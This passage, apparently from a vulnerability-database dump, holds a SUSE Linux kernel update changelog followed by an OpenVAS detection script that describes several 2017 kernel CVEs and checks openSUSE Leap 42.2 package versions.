flush data when locking a file to ensure cache coherence for mmap\n (bsc#981309).\n - NFS: invalidate file size when taking a lock (git-fixes).\n - NFS: only invalidate dentrys that are clearly invalid (bsc#1047118).\n - PCI / PM: Fix native PME handling during system suspend/resume\n (bsc#1051478).\n - PCI: Add Mellanox device IDs (bsc#1051478).\n - PCI: Convert Mellanox broken INTx quirks to be for listed devices only\n (bsc#1051478).\n - PCI: Correct PCI_STD_RESOURCE_END usage (bsc#1051478).\n - PCI: Enable ECRC only if device supports it (bsc#1051478).\n - PCI: Support INTx masking on ConnectX-4 with firmware x.14.1100+\n (bsc#1051478).\n - PCI: dwc: Fix uninitialized variable in dw_handle_msi_irq()\n (bsc#1051478).\n - PCI: dwc: dra7xx: Use RW1C for IRQSTATUS_MSI and IRQSTATUS_MAIN\n (bsc#1051478).\n - PM / Hibernate: Fix scheduling while atomic during hibernation\n (bsc#1051059).\n - Revert "/proc/iomem: only expose physical resource addresses to\n privileged users" (kabi).\n - Revert "ACPI / video: Add force_native quirk for HP Pavilion dv6"\n (bsc#1031717).\n - Revert "Add "shutdown" to "struct class"." (kabi).\n - Revert "KVM: x86: fix emulation of RSM and IRET instructions" (kabi).\n - Revert "Make file credentials available to the seqfile interfaces"\n (kabi).\n - Revert "mm/list_lru.c: fix list_lru_count_node() to be race free" (kabi).\n - Revert "powerpc/numa: Fix percpu allocations to be NUMA aware"\n (bsc#1048914).\n - Revert "tpm: Issue a TPM2_Shutdown for TPM2 devices." (kabi).\n - USB: core: fix device node leak (bsc#1047487).\n - Update kabi files: sync with 4.4.74 updates\n - af_key: Add lock to key dump (bsc#1047653).\n - af_key: Fix slab-out-of-bounds in pfkey_compile_policy (bsc#1047354).\n - b43: Add missing MODULE_FIRMWARE() (bsc#1037344).\n - bcache: force trigger gc (bsc#1038078).\n - bcache: force trigger gc (bsc#1038078).\n - bcache: only recovery I/O error for writethrough mode (bsc#1043652).\n - bcache: only recovery I/O error for writethrough mode (bsc#1043652).\n - bdi: Fix use-after-free in wb_congested_put() (bsc#1040307).\n - blacklist.conf: 9eeacd3a2f17 not a bug fix (bnc#1050061)\n - blacklist.conf: Blacklist c133c7615751 ('x86/nmi: Fix timeout test in\n test_nmi_ipi()') It only fixes a self-test (bsc#1051478).\n - blacklist.conf: Blacklist c9525a3fab63 ('x86/watchdog: Fix Kconfig help\n text file path reference to lockup watchdog documentation') Updates only\n kconfig help-text (bsc#1051478).\n - blacklist.conf: add inapplicable commits for wifi (bsc#1031717)\n - blacklist.conf: add unapplicable drm fixes (bsc#1031717).\n - blacklist.conf: add unapplicable/cosmetic iwlwifi fixes (bsc#1031717).\n - blkfront: add uevent for size change (bnc#1036632).\n - block: Allow bdi re-registration (bsc#1040307).\n - block: Fix front merge check (bsc#1051239).\n - block: Make del_gendisk() safer for disks without queues (bsc#1040307).\n - block: Move bdi_unregister() to del_gendisk() (bsc#1040307).\n - block: do not allow updates through sysfs until registration completes\n (bsc#1047027).\n - bnxt: add a missing rcu synchronization (bnc#1038583).\n - bnxt: do not busy-poll when link is down (bnc#1038583).\n - bnxt_en: Enable MRU enables bit when configuring VNIC MRU (bnc#1038583).\n - bnxt_en: Fix "uninitialized variable" bug in TPA code path (bnc#1038583).\n - bnxt_en: Fix NULL pointer dereference in a failure path during open\n (bnc#1038583).\n - bnxt_en: Fix NULL pointer dereference in reopen failure path\n (bnc#1038583).\n - bnxt_en: Fix TX push operation on ARM64 (bnc#1038583).\n - bnxt_en: Fix VF virtual link state (bnc#1038583).\n - bnxt_en: Fix a VXLAN vs GENEVE issue (bnc#1038583).\n - bnxt_en: Fix and clarify link_info->advertising (bnc#1038583).\n - bnxt_en: Fix ring arithmetic in bnxt_setup_tc() (bnc#1038583).\n - bnxt_en: Pad TX packets below 52 bytes (bnc#1038583).\n - bnxt_en: Refactor TPA code path (bnc#1038583).\n - bnxt_en: fix pci cleanup in bnxt_init_one() failure path (bnc#1038583).\n - bnxt_en: initialize rc to zero to avoid returning garbage (bnc#1038583).\n - brcmfmac: Fix glom_skb leak in brcmf_sdiod_recv_chain (bsc#1031717).\n - btrfs: Add WARN_ON for qgroup reserved underflow (bsc#1031515).\n - btrfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - btrfs: add cond_resched to btrfs_qgroup_trace_leaf_items (bsc#1028286).\n - btrfs: fix early ENOSPC due to delalloc (bsc#1049226).\n - btrfs: fix lockup in find_free_extent with read-only block groups\n (bsc#1046682).\n - btrfs: incremental send, fix invalid path for link commands\n (bsc#1051479).\n - btrfs: incremental send, fix invalid path for unlink commands\n (bsc#1051479).\n - btrfs: resume qgroup rescan on rw remount (bsc#1047152).\n - btrfs: send, fix invalid path after renaming and linking file\n (bsc#1051479).\n - ceph: fix readpage from fscache (bsc#1057015).\n - cpuidle: dt: Add missing 'of_node_put()' (bnc#1022476).\n - crypto: s5p-sss - fix incorrect usage of scatterlists api (bsc#1048317).\n - cx82310_eth: use skb_cow_head() to deal with cloned skbs (bsc# 1045154).\n - cxgb4: Fix stack out-of-bounds read due to wrong size to\n t4_record_mbox() (bsc#1021424 bsc#1022743).\n - cxl: Unlock on error in probe (bsc#1034762, Pending SUSE Kernel Fixes).\n - dentry name snapshots (bsc#1049483).\n - dm: fix second blk_delay_queue() parameter to be in msec units not\n (bsc#1047670).\n - drivers: hv: vmbus: Increase the time between retries in\n vmbus_post_msg() (bnc#1044112).\n - drivers: net: xgene: Fix wrong logical operation (bsc#1056827).\n - drm/amdgpu: Fix overflow of watermark calcs at greater than 4k\n resolutions (bsc#1031717).\n - drm/bochs: Implement nomodeset (bsc#1047096).\n - drm/i915/fbdev: Stop repeating tile configuration on stagnation\n (bsc#1031717).\n - drm/i915: Fix scaler init during CRTC HW state readout (bsc#1031717).\n - drm/i915: Serialize GTT/Aperture accesses on BXT (bsc#1046821).\n - drm/virtio: do not leak bo on drm_gem_object_init failure (bsc#1047277).\n - drm/vmwgfx: Fix large topology crash (bsc#1048155).\n - drm/vmwgfx: Limit max desktop dimensions to 8Kx8K (bsc#1048155).\n - drm/vmwgfx: Support topology greater than texture size (bsc#1048155).\n - efi/libstub: Skip GOP with PIXEL_BLT_ONLY format (bnc#974215).\n - ext2: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - ext4: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - ext4: avoid unnecessary stalls in ext4_evict_inode() (bsc#1049486).\n - ext4: handle the rest of ext4_mb_load_buddy() ENOMEM errors\n (bsc#1012829).\n - fs/fcntl: f_setown, avoid undefined behaviour (bnc#1006180).\n - fuse: initialize the flock flag in fuse_file on allocation (git-fixes).\n - gcov: add support for gcc version greater than 6 (bsc#1051663).\n - gcov: support GCC 7.1 (bsc#1051663).\n - gfs2: Do not clear SGID when inheriting ACLs (bsc#1012829).\n - gfs2: fix flock panic issue (bsc#1012829).\n - hrtimer: Catch invalid clockids again (bsc#1047651).\n - hrtimer: Revert CLOCK_MONOTONIC_RAW support (bsc#1047651).\n - hv_util: switch to using timespec64.\n - hv_utils: drop .getcrosststamp() support from PTP driver (bnc#1044112,\n bnc#1042778, bnc#1029693).\n - hv_utils: fix TimeSync work on pre-TimeSync-v4 hosts (bnc#1044112,\n bnc#1042778, bnc#1029693).\n - i2c: designware-baytrail: fix potential null pointer dereference on dev\n (bsc#1011913).\n - i40e: Removal of workaround for simple MAC address filter deletion\n (bsc#1039915).\n - i40e: When searching all MAC/VLAN filters, ignore removed filters\n (bsc#1039915).\n - i40e: add VSI info to macaddr messages (bsc#1039915).\n - i40e: add hw struct local variable (bsc#1039915).\n - i40e: add private flag to control source pruning (bsc#1034075).\n - i40e: avoid O(n^2) loop when deleting all filters (bsc#1039915).\n - i40e: avoid looping to check whether we're in VLAN mode (bsc#1039915).\n - i40e: delete filter after adding its replacement when converting\n (bsc#1039915).\n - i40e: do not add broadcast filter for VFs (bsc#1039915).\n - i40e: do not allow i40e_vsi_(add|kill)_vlan to operate when VID lower\n than 1 (bsc#1039915).\n - i40e: drop is_vf and is_netdev fields in struct i40e_mac_filter\n (bsc#1039915).\n - i40e: enable VSI broadcast promiscuous mode instead of adding broadcast\n filter (bsc#1039915).\n - i40e: factor out addition/deletion of VLAN per each MAC address\n (bsc#1039915).\n - i40e: fix MAC filters when removing VLANs (bsc#1039915).\n - i40e: fold the i40e_is_vsi_in_vlan check into i40e_put_mac_in_vlan\n (bsc#1039915).\n - i40e: implement __i40e_del_filter and use where applicable (bsc#1039915).\n - i40e: make use of __dev_uc_sync and __dev_mc_sync (bsc#1039915).\n - i40e: move all updates for VLAN mode into i40e_sync_vsi_filters\n (bsc#1039915).\n - i40e: move i40e_put_mac_in_vlan and i40e_del_mac_all_vlan (bsc#1039915).\n - i40e: no need to check is_vsi_in_vlan before calling\n i40e_del_mac_all_vlan (bsc#1039915).\n - i40e: properly cleanup on allocation failure in i40e_sync_vsi_filters\n (bsc#1039915).\n - i40e: recalculate vsi->active_filters from hash contents (bsc#1039915).\n - i40e: refactor Rx filter handling (bsc#1039915).\n - i40e: refactor i40e_put_mac_in_vlan to avoid changing f->vlan\n (bsc#1039915).\n - i40e: refactor i40e_update_filter_state to avoid passing aq_err\n (bsc#1039915).\n - i40e: remove code to handle dev_addr specially (bsc#1039915).\n - i40e: remove duplicate add/delete adminq command code for filters\n (bsc#1039915).\n - i40e: remove second check of VLAN_N_VID in i40e_vlan_rx_add_vid\n (bsc#1039915).\n - i40e: removed unreachable code (bsc#1039915).\n - i40e: rename i40e_put_mac_in_vlan and i40e_del_mac_all_vlan\n (bsc#1039915).\n - i40e: restore workaround for removing default MAC filter (bsc#1039915).\n - i40e: set broadcast promiscuous mode for each active VLAN (bsc#1039915).\n - i40e: store MAC/VLAN filters in a hash with the MAC Address as key\n (bsc#1039915).\n - i40e: use (add|rm)_vlan_all_mac helper functions when changing PVID\n (bsc#1039915).\n - i40e: when adding or removing MAC filters, correctly handle VLANs\n (bsc#1039915).\n - i40e: write HENA for VFs (bsc#1039915).\n - ibmvnic: Check for transport event on driver resume (bsc#1051556,\n bsc#1052709).\n - ibmvnic: Clean up resources on probe failure (bsc#1058116).\n - ibmvnic: Initialize SCRQ's during login renegotiation (bsc#1052223).\n - ibmvnic: Report rx buffer return codes as netdev_dbg (bsc#1052794).\n - iio: hid-sensor: fix return of -EINVAL on invalid values in ret or value\n (bsc#1031717).\n - introduce the walk_process_tree() helper (bnc#1022476).\n - iommu/amd: Fix schedule-while-atomic BUG in initialization code\n (bsc1052533).\n - ipv4: Should use consistent conditional judgement for ip fragment in\n __ip_append_data and ip_finish_output (bsc#1041958).\n - ipv6: Should use consistent conditional judgement for ip6 fragment\n between __ip6_append_data and ip6_finish_output (bsc#1041958).\n - iwlwifi: missing error code in iwl_trans_pcie_alloc() (bsc#1031717).\n - iwlwifi: mvm: compare full command ID.\n - iwlwifi: mvm: do not send CTDP commands via debugfs if not supported\n (bsc#1031717).\n - iwlwifi: mvm: reset the fw_dump_desc pointer after ASSERT (bsc#1031717).\n - iwlwifi: mvm: synchronize firmware DMA paging memory.\n - iwlwifi: mvm: unconditionally stop device after init (bsc#1031717).\n - iwlwifi: mvm: unmap the paging memory before freeing it.\n - iwlwifi: pcie: fix command completion name debug (bsc#1031717).\n - kABI-fix for "x86/panic: replace smp_send_stop() with kdump friendly\n version in panic path" (bsc#1051478).\n - kernel/*: switch to memdup_user_nul() (bsc#1048893).\n - kvm: nVMX: Fix nested_vmx_check_msr_bitmap_controls (bsc#1051478).\n - lib: test_rhashtable: Fix KASAN warning (bsc#1055359).\n - lib: test_rhashtable: fix for large entry counts (bsc#1055359).\n - libnvdimm, pmem: fix a NULL pointer BUG in nd_pmem_notify (bsc#1023175).\n - libnvdimm: fix badblock range handling of ARS range (bsc#1023175).\n - lightnvm: nvme reset_controller is not working after adapter's firmware\n upgrade (bsc#988784).\n - lightnvm: remove unused rq parameter of nvme_nvm_rqtocmd() to kill\n warning.\n - mac80211_hwsim: Replace bogus hrtimer clockid (bsc#1047651).\n - md/raid5: fix a race condition in stripe batch (linux-stable).\n - mm, madvise: ensure poisoned pages are removed from per-cpu lists (VM hw\n poison -- git fixes).\n - mm-adaptive-hash-table-scaling-v5 (bnc#1036303).\n - mm/page_alloc.c: apply gfp_allowed_mask before the first allocation\n attempt (bnc#971975 VM -- git fixes).\n - mm: adaptive hash table scaling (bnc#1036303).\n - mm: call page_ext_init() after all struct pages are initialized (VM\n Debugging Functionality, bsc#1047048).\n - mm: drop HASH_ADAPT (bnc#1036303).\n - mm: fix classzone_idx underflow in shrink_zones() (VM Functionality,\n bsc#1042314).\n - mm: make PR_SET_THP_DISABLE immediately active (bnc#1048891).\n - mptsas: Fixup device hotplug for VMWare ESXi (bsc#1030850).\n - mwifiex: do not update MCS set from hostapd (bsc#1031717).\n - net/mlx5: Fix driver load error flow when firmware is stuck (git-fixes).\n - net: account for current skb length when deciding about UFO\n (bsc#1041958).\n - net: ena: add hardware hints capability to the driver (bsc#1047121).\n - net: ena: add missing return when ena_com_get_io_handlers() fails\n (bsc#1047121).\n - net: ena: add missing unmap bars on device removal (bsc#1047121).\n - net: ena: add reset reason for each device FLR (bsc#1047121).\n - net: ena: add support for out of order rx buffers refill (bsc#1047121).\n - net: ena: allow the driver to work with small number of msix vectors\n (bsc#1047121).\n - net: ena: bug fix in lost tx packets detection mechanism (bsc#1047121).\n - net: ena: change return value for unsupported features unsupported\n return value (bsc#1047121).\n - net: ena: change sizeof() argument to be the type pointer (bsc#1047121).\n - net: ena: disable admin msix while working in polling mode (bsc#1047121).\n - net: ena: fix bug that might cause hang after consecutive open/close\n interface (bsc#1047121).\n - net: ena: fix race condition between submit and completion admin command\n (bsc#1047121).\n - net: ena: fix rare uncompleted admin command false alarm (bsc#1047121).\n - net: ena: fix theoretical Rx hang on low memory systems (bsc#1047121).\n - net: ena: separate skb allocation to dedicated function (bsc#1047121).\n - net: ena: update driver's rx drop statistics (bsc#1047121).\n - net: ena: update ena driver to version 1.1.7 (bsc#1047121).\n - net: ena: update ena driver to version 1.2.0 (bsc#1047121).\n - net: ena: use lower_32_bits()/upper_32_bits() to split dma address\n (bsc#1047121).\n - net: ena: use napi_schedule_irqoff when possible (bsc#1047121).\n - net: handle NAPI_GRO_FREE_STOLEN_HEAD case also in napi_frags_finish()\n (bsc#1042286).\n - net: phy: Do not perform software reset for Generic PHY (bsc#1042286).\n - netfilter: fix IS_ERR_VALUE usage (bsc#1052888).\n - netfilter: x_tables: pack percpu counter allocations (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct instead of packet counter\n (bsc#1052888).\n - netfilter: x_tables: pass xt_counters struct to counter allocator\n (bsc#1052888).\n - new helper: memdup_user_nul() (bsc#1048893).\n - ocfs2: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - ocfs2: Make ocfs2_set_acl() static (bsc#1030552).\n - ocfs2: fix deadlock caused by recursive locking in xattr (bsc#1012829).\n - of: fix "/cpus" reference leak in of_numa_parse_cpu_nodes()\n (bsc#1056827).\n - ovl: fix dentry leak for default_permissions (bsc#1054084).\n - percpu_ref: allow operation mode switching operations to be called\n concurrently (bsc#1055096).\n - percpu_ref: remove unnecessary RCU grace period for staggered atomic\n switching confirmation (bsc#1055096).\n - percpu_ref: reorganize __percpu_ref_switch_to_atomic() and relocate\n percpu_ref_switch_to_atomic() (bsc#1055096).\n - percpu_ref: restructure operation mode switching (bsc#1055096).\n - percpu_ref: unify staggered atomic switching wait behavior (bsc#1055096).\n - perf/x86/intel: Cure bogus unwind from PEBS entries (bsc#1051478).\n - perf/x86/intel: Fix PEBSv3 record drain (bsc#1051478).\n - perf/x86: Fix spurious NMI with PEBS Load Latency event (bsc#1051478).\n - platform/x86: ideapad-laptop: Add IdeaPad 310-15IKB to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add IdeaPad V310-15ISK to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add IdeaPad V510-15IKB to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Lenovo Yoga 910-13IKB to no_hw_rfkill\n dmi list (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y520-15IKBN to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y700 15-ACZ to no_hw_rfkill DMI list\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add Y720-15IKBN to no_hw_rfkill\n (bsc#1051022).\n - platform/x86: ideapad-laptop: Add several models to no_hw_rfkill\n (bsc#1051022).\n - prctl: propagate has_child_subreaper flag to every descendant\n (bnc#1022476).\n - qeth: fix L3 next-hop im xmit qeth hdr (bnc#1052773, LTC#157374).\n - reiserfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - rpm/kernel-binary.spec.in: find-debuginfo.sh should not touch build-id\n This needs rpm-4.14+ (bsc#964063).\n - rtnetlink: fix rtnl_vfinfo_size (bsc#1056261).\n - s390: export symbols for crash-kmp (bsc#1053915).\n - sched/core: Allow __sched_setscheduler() in interrupts when PI is not\n used (bnc#1022476).\n - sched/debug: Print the scheduler topology group mask (bnc#1022476).\n - sched/fair, cpumask: Export for_each_cpu_wrap() (bnc#1022476).\n - sched/fair: Fix O(nr_cgroups) in load balance path (bnc#1022476).\n - sched/fair: Use task_groups instead of leaf_cfs_rq_list to walk all\n cfs_rqs (bnc#1022476).\n - sched/topology: Add sched_group_capacity debugging (bnc#1022476).\n - sched/topology: Fix building of overlapping sched-groups (bnc#1022476).\n - sched/topology: Fix overlapping sched_group_capacity (bnc#1022476).\n - sched/topology: Move comment about asymmetric node setups (bnc#1022476).\n - sched/topology: Refactor function build_overlap_sched_groups()\n (bnc#1022476).\n - sched/topology: Remove FORCE_SD_OVERLAP (bnc#1022476).\n - sched/topology: Simplify build_overlap_sched_groups() (bnc#1022476).\n - sched/topology: Small cleanup (bnc#1022476).\n - sched/topology: Verify the first group matches the child domain\n (bnc#1022476).\n - scsi: Add STARGET_CREATE_REMOVE state to scsi_target_state (bsc#1013887).\n - scsi: bnx2i: missing error code in bnx2i_ep_connect() (bsc#1048221).\n - scsi: kABI fix for new state STARGET_CREATED_REMOVE (bsc#1013887).\n - scsi: storvsc: Workaround for virtual DVD SCSI version (bnc#1044636).\n - scsi_devinfo: fixup string compare (bsc#1037404).\n - scsi_dh_alua: suppress errors from unsupported devices (bsc#1038792).\n - smsc75xx: use skb_cow_head() to deal with cloned skbs (bsc#1045154).\n - sr9700: use skb_cow_head() to deal with cloned skbs (bsc#1045154).\n - supported.conf: clear mistaken external support flag for cifs.ko\n (bsc#1053802).\n - sysctl: do not print negative flag for proc_douintvec (bnc#1046985).\n - sysctl: fix lax sysctl_check_table() sanity check (bsc#1048893).\n - sysctl: fold sysctl_writes_strict checks into helper (bsc#1048893).\n - sysctl: kdoc'ify sysctl_writes_strict (bsc#1048893).\n - sysctl: simplify unsigned int support (bsc#1048893).\n - timers: Plug locking race vs. timer migration (bnc#1022476).\n - tpm: Issue a TPM2_Shutdown for TPM2 devices (bsc#1053117).\n - tpm: KABI fix (bsc#1053117).\n - tpm: fix: return rc when devm_add_action() fails (bsc#1020645,\n bsc#1034048).\n - tpm: read burstcount from TPM_STS in one 32-bit transaction\n (bsc#1020645, bsc#1034048).\n - tpm_tis_core: Choose appropriate timeout for reading burstcount\n (bsc#1020645, bsc#1034048).\n - tpm_tis_core: convert max timeouts from msec to jiffies (bsc#1020645,\n bsc#1034048).\n - tty: serial: msm: Support more bauds (git-fixes).\n - ubifs: Correctly evict xattr inodes (bsc#1012829).\n - ubifs: Do not leak kernel memory to the MTD (bsc#1012829).\n - udf: Fix deadlock between writeback and udf_setsize() (bsc#1012829).\n - udf: Fix races with i_size changes during readpage (bsc#1012829).\n - vfs: fix missing inode_get_dev sites (bsc#1052049).\n - x86/LDT: Print the real LDT base address (bsc#1051478).\n - x86/dmi: Switch dmi_remap() from ioremap() to ioremap_cache()\n (bsc#1051399).\n - x86/mce: Make timer handling more robust (bsc#1042422).\n - x86/panic: replace smp_send_stop() with kdump friendly version in panic\n path (bsc#1051478).\n - xen-netfront: Rework the fix for Rx stall during OOM and network stress\n (git-fixes).\n - xen/balloon: do not online new memory initially (bnc#1028173).\n - xen/pvh*: Support greater than 32 VCPUs at domain restore (bnc#1045563).\n - xen: allocate page for shared info page from low memory (bnc#1038616).\n - xen: hold lock_device_hotplug throughout vcpu hotplug operations\n (bsc#1042422).\n - xfrm: NULL dereference on allocation failure (bsc#1047343).\n - xfrm: Oops on error in pfkey_msg2xfrm_state() (bsc#1047653).\n - xfs: Do not clear SGID when inheriting ACLs (bsc#1030552).\n - xfs: do not BUG() on mixed direct and mapped I/O (bsc#1050188).\n - xfs: fix inobt inode allocation search optimization (bsc#1012829).\n\n", "edition": 1, "modified": "2017-11-08T21:08:45", "published": "2017-11-08T21:08:45", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-11/msg00013.html", "id": "SUSE-SU-2017:2956-1", "type": "suse", "title": "Security update for the Linux Kernel (important)", "cvss": {"score": 8.3, "vector": "AV:ADJACENT_NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2020-01-31T18:26:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-14489", "CVE-2017-1000252", "CVE-2017-12153", "CVE-2017-12154"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-10-18T00:00:00", "id": "OPENVAS:1361412562310851628", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851628", "type": "openvas", "title": "openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2739-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851628\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-10-18 16:55:05 +0200 (Wed, 18 Oct 2017)\");\n script_cve_id(\"CVE-2017-1000252\", \"CVE-2017-12153\", \"CVE-2017-12154\", \"CVE-2017-14489\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for kernel (openSUSE-SU-2017:2739-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'kernel'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The openSUSE Leap 42.2 Kernel was updated to 4.4.90 to receive various\n security and bugfixes.\n\n\n The following security bugs were fixed:\n\n - CVE-2017-1000252: The KVM subsystem in the Linux kernel allowed guest OS\n users to cause a denial of service (assertion failure, and hypervisor\n hang or crash) via an out-of bounds guest_irq value, related to\n arch/x86/kvm/vmx.c and virt/kvm/eventfd.c (bnc#1058038).\n\n - CVE-2017-14489: The iscsi_if_rx function in\n drivers/scsi/scsi_transport_iscsi.c in the Linux kernel allowed local\n users to cause a denial of service (panic) by leveraging incorrect\n length validation (bnc#1059051).\n\n - CVE-2017-12153: A security flaw was discovered in the\n nl80211_set_rekey_data() function in net/wireless/nl80211.c in the Linux\n kernel This function did not check whether the required attributes are\n present in a Netlink request. This request can be issued by a user with\n the CAP_NET_ADMIN capability and may result in a NULL pointer\n dereference and system crash (bnc#1058410).\n\n - CVE-2017-12154: The prepare_vmcs02 function in arch/x86/kvm/vmx.c in the\n Linux kernel did not ensure that the 'CR8-load exiting' and 'CR8-store\n exiting' L0 vmcs02 controls exist in cases where L1 omits the 'use TPR\n shadow' vmcs12 control, which allowed KVM L2 guest OS users to obtain\n read and write access to the hardware CR8 register (bnc#1058507).\n\n The following non-security bugs were fixed:\n\n - arc: Re-enable MMU upon Machine Check exception (bnc#1012382).\n\n - arm64: fault: Route pte translation faults via do_translation_fault\n (bnc#1012382).\n\n - arm64: Make sure SPsel is always set (bnc#1012382).\n\n - arm: pxa: add the number of DMA requestor lines (bnc#1012382).\n\n - arm: pxa: fix the number of DMA requestor lines (bnc#1012382).\n\n - bcache: correct cache_dirty_target in __update_writeback_rate()\n (bnc#1012382).\n\n - bcache: Correct return value for sysfs attach errors (bnc#1012382).\n\n - bcache: do not subtract sectors_to_gc for bypassed IO (bnc#1012382).\n\n - bcache: fix bch_hprint crash and improve output (bnc#1012382).\n\n - bcache: fix for gc and write-back race (bnc#1012382).\n\n - bcache: Fix leak of bdev reference (bnc#1012382).\n\n - bcache: initialize dirty stripes in flash_dev_run() (bnc#1012382).\n\n - blacklist.conf: Add commit b5accbb0dfae\n\n - blacklist.conf: add one more\n\n - block: Relax a check in blk_start_queue() (bnc#1012382).\n\n - bsg-lib: do not free job in bsg_prepare_job (bnc#1012382).\n\n - btrfs: change how we decide to commit transactions during flushing\n (bsc#1060197).\n\n - btrfs: fix NULL pointer dereference from free_reloc_roots()\n (bnc#1012382 ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"Linux Kernel on openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2739-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.2\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug\", rpm:\"kernel-debug~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base\", rpm:\"kernel-debug-base~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-base-debuginfo\", rpm:\"kernel-debug-base-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debuginfo\", rpm:\"kernel-debug-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-debugsource\", rpm:\"kernel-debug-debugsource~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel\", rpm:\"kernel-debug-devel~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-debug-devel-debuginfo\", rpm:\"kernel-debug-devel-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default\", rpm:\"kernel-default~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base\", rpm:\"kernel-default-base~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-base-debuginfo\", rpm:\"kernel-default-base-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debuginfo\", rpm:\"kernel-default-debuginfo~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-debugsource\", rpm:\"kernel-default-debugsource~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-default-devel\", rpm:\"kernel-default-devel~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build\", rpm:\"kernel-obs-build~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-build-debugsource\", rpm:\"kernel-obs-build-debugsource~4.4.90~18.32.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"kernel-obs-qa\", 